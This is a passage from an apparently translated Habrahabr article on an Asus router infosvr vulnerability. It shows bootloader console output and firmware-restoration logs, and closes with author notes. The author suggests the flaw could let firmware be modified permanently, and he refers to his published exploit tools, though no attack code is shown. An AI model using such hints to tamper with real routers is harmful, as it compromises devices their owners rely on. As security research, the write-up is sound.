Set 8196C PHY Patch OK

---Ethernet init Okay!

ps
Unknown command!

ls
Unknown command!

help
— COMMAND MODE HELP — HELP (?): Print this help message
D

DB

DW

EW

EB

CMP: CMP
IPCONFIG:
AUTOBURN: 0/1
LOADADDR:
J: Jump to
FLW : Write offset-data to SPI from RAM


Without thinking twice, I launched the same Firmware Restoration and restored the firmware.
Display of Asus Firmware Restoration Utility
D
File Start: 80500000, length = 0

** TFTP GET File ASUSSPACELINK1, Size 0 Byte

** filename: 31 13 FFFFFFFE FFFFFFA9 Byte
run ASUSSPACELINK

** TFTP Client Upload, File Name: ASUSSPACELINK

** TFTP Client Upload File Size = 278ABC Bytes at 80500000

Success!

Linux kernel (root-fs) upgrade.
checksum Ok!
burn Addr = 0x10000! srcAddr = 0x80500000 len = 0xcd012

#### head_offset: 0 (0x0), flash_burnAddr: 0x10000, is_firmware: 1

#### Start to burn ...
...
Flash Write Successed!

Root filesystem upgrade.
checksum Ok!
burn Addr = 0x100000! srcAddr = 0x805cd022 len = 0x1aba9a

#### head_offset: 839698 (0xcd012), flash_burnAddr: 0xdd012, is_firmware: 1

#### Start to burn ...
...
Flash Write Successed!

reboot .......


The very fact that the firmware of a running router got damaged suggests that the vulnerability can be used to modify it. Changes to the router would then be permanent, not just until the next reboot as they have been so far.
But I have neither the time nor the desire to look into this.



AsusRouterTools sources as well as Windows binaries can be found in the repository on GitHub.

P.S. Since I have figured out infosvr, why not use it for its intended purpose as well? AsusDiscover is the only thing that will continue to work after installing firmware with the vulnerability fixed.

Console version of Device Discovery


PS This is my first publication, so I will be glad to any advice and comments both regarding the article and about the program code.

PPS A little bit of indignation: Habrahabr should add protection against accidental publication to the article writing interface. Somehow I pressed Enter - and the "Publish" button worked. You need to add either some kind of safety checkbox, or ask again before publication, or give the opportunity to immediately withdraw the sending for publication. Yes, and such a big one ... You can miss and poke it instead of the "Preview". Why is this not thought out?

UPD: Together with readers (@a553), bugs in the exploits that led to a crash when receiving a response from some routers have been fixed. More details in this comment.
